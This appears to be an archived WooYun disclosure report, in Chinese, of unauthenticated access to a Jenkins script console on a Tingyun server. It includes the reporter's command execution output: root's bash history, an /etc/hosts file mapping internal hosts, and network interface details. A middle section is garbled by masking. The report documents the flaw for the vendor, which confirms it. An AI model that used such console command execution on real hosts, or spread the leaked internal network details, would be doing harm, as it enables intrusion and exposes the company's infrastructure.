乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-10: 细节已通知厂商并且等待厂商处理中 2016-03-10: 厂商已经确认,细节仅向厂商公开 2016-03-20: 细节向核心白帽子及相关领域专家公开 2016-03-30: 细节向普通白帽子公开 2016-04-09: 细节向实习白帽子公开 2016-04-24: 细节向公众公开
rt
1.https://**.**.**/_***************45618b87d974f5df4fef.png&qu********************洞^***************2.https://**.**.**/_***************^^权^********************2a67c6e3a33bbea8dd5a.png&qu******************************^^^*****3.https://**.**.**/script_***************ame**********-003.tx.t********************f089517dcfbd7de019f6.png&qu********************bash_h********************7b500141af5e5a4f7cf6.png&qu********************^^**********n.com:netop/tingyun-**********789**********netop/tingyun-com**********789**********com:netop/tingy**********789**********h/known**********789**********com:netop/tingy**********789**********h/known**********789**********l**********789**********com:netop/tingy**********789**********l**********789**********-centos/&********************bffb256da0ba05422413.png&qu********************c/ho********************y-pub-gw-001.**********-gw-002.tx**********jump-001.t**********_db-001.tx.**********ave-001.tx.**********_redis-001.t**********nf_db-001.t********************master-001.**********ster-004.tx.**********ster-005.tx.**********gyun.com tx-ty-k8s-**********gyun.com tx-ty-k8s-********** tx-ty-k8s-etcd-003.tx.**********master-002.**********master-003.**********master-001.********************slave-001.tx**********wser-slave-00**********wser-slave-00**********wser-slave-00**********wser-slave-00**********gconf_db-001.**********r-data-001.**********-trace-001.t******************** reg**********try.ting********************ster-001.tx**********node-001.t**********node-002.t********************tingyun.com********************026ce4ab488120fbc74f.png&qu********************fig**********t;UP,BROADCAST,MU**********mask 255.255.0.**********b:e8 txqueuel**********7 bytes 258**********opped 0 ove********** bytes 125407**********overruns 0 carr********************AST,RUNNING,MUL**********255.255.255.0 b**********2d txqueuelen ********** bytes 14151845**********opped 0 ove**********3 bytes 22069**********overruns 0 carr********************BACK,RUNNING**********0.1 netma**********len 0 (Loc********** bytes 33921**********opped 0 ove********** bytes 33921**********overruns 0 carr**********de&g********************bb4410c4ebecdd496d023c.png*****
https://119.29.69.210/
存在漏洞地址https://119.29.69.210/jenkins未授权访问
命令执行URLhttps://119.29.69.210/scripthostnametx-ty-mesos-slave-003.tx.tingyun.com
cat /root/.bash_history
部分内容
git clone [email protected]:netop/tingyun-common-centos.git:10222#1453789283git clone [email protected]:netop/tingyun-common-centos.git:10022#1453789836git clone [email protected]:netop/tingyun-common-centos.git#1453789842vim /root/.ssh/known_hosts #1453789847git clone [email protected]:netop/tingyun-common-centos.git#1453789851vim /root/.ssh/known_hosts #1453789855ll#1453789857git clone [email protected]:netop/tingyun-common-centos.git#1453789862ll#1453789865cd tingyun-common-centos/
cat /etc/hosts
10.8.0.2 tx-ty-pub-gw-001.tx.tingyun.com10.8.0.3 tx-ty-pub-gw-002.tx.tingyun.com10.8.0.4 tx-ty-pub-jump-001.tx.tingyun.com10.8.0.5 tx-ty-pub-cd_db-001.tx.tingyun.com10.8.0.6 tx-ty-pub-slave-001.tx.tingyun.com10.8.0.7 tx-ty-pub-conf_redis-001.tx.tingyun.com10.8.0.8 tx-ty-pub-conf_db-001.tx.tingyun.com10.8.5.2 tx-ty-mesos-master-001.tx.tingyun.com10.8.5.3 tx-ty-mesos-master-004.tx.tingyun.com 10.8.5.4 tx-ty-mesos-master-005.tx.tingyun.com 10.8.5.5 tx-ty-mesos-slave-001.tx.tingyun.com tx-ty-k8s-etcd-001.tx.tingyun.com10.8.5.6 tx-ty-mesos-slave-002.tx.tingyun.com tx-ty-k8s-etcd-002.tx.tingyun.com10.8.5.7 tx-ty-mesos-slave-003.tx.tingyun.com tx-ty-k8s-etcd-003.tx.tingyun.com #ssh port 102210.8.5.8 tx-ty-mesos-master-002.tx.tingyun.com10.8.5.9 tx-ty-mesos-master-003.tx.tingyun.com10.8.5.10 tx-ty-salt-master-001.tx.tingyun.com10.8.3.2 tx-ty-browser-slave-001.tx.tingyun.com10.8.3.3 tx-ty-browser-slave-002.tx.tingyun.com10.8.3.4 tx-ty-browser-slave-003.tx.tingyun.com10.8.3.5 tx-ty-browser-slave-004.tx.tingyun.com10.8.3.6 tx-ty-browser-slave-005.tx.tingyun.com10.8.3.7 tx-ty-browser-bigconf_db-001.tx.tingyun.com10.8.3.8 tx-ty-browser-data-001.tx.tingyun.com10.8.3.9 tx-ty-browser-trace-001.tx.tingyun.com#docker registry#10.8.5.5 registry.tingyun.com10.8.6.2 tx-ty-k8s-master-001.tx.tingyun.com10.8.6.3 tx-ty-k8s-node-001.tx.tingyun.com10.8.6.4 tx-ty-k8s-node-002.tx.tingyun.com192.168.1.16 package.tingyun.com
ifconfig -a
docker0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500 inet 172.17.42.1 netmask 255.255.0.0 broadcast 0.0.0.0 ether 02:42:0d:cb:0b:e8 txqueuelen 0 (Ethernet) RX packets 49017 bytes 2584842 (2.4 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 94935 bytes 125407531 (119.5 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 10.8.5.7 netmask 255.255.255.0 broadcast 10.8.5.255 ether 52:54:00:9c:7e:2d txqueuelen 1000 (Ethernet) RX packets 208807475 bytes 141518454000 (131.7 GiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 164469893 bytes 22069239753 (20.5 GiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 loop txqueuelen 0 (Local Loopback) RX packets 431834 bytes 339210860 (323.4 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 431834 bytes 339210860 (323.4 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
jenkins 未授权访问
危害等级:高
漏洞Rank:15
确认时间:2016-03-10 11:57
测试系统。已确认,正在修复。
暂无